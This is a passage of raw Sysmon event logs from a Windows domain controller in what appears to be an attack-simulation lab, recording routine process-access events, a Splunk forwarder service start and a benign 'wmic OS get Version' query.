DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.094{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.094{08A6967A-4286-6000-0A00-000000009A01}8441108C:\Windows\system32\services.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.558{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.057{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.057{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.053{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.032{08A6967A-4299-6000-3B00-000000009A01}36923728C:\Windows\system32\conhost.exe{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.028{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.028{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.015{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4299-6000-3B00-000000009A01}3692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.994{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.993{08A6967A-4298-6000-3000-000000009A01}23763620C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.984{08A6967A-4298-6000-3A00-000000009A01}3672C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.979{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.978{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.978{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.969{08A6967A-4286-6000-0A00-000000009A01}8442632C:\Windows\system32\services.exe{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.950{08A6967A-4286-6000-0A00-000000009A01}8441208C:\Windows\system32\services.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.947{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3900-000000009A01}3516C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.947{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.947{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.946{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.936{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3900-000000009A01}3516C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 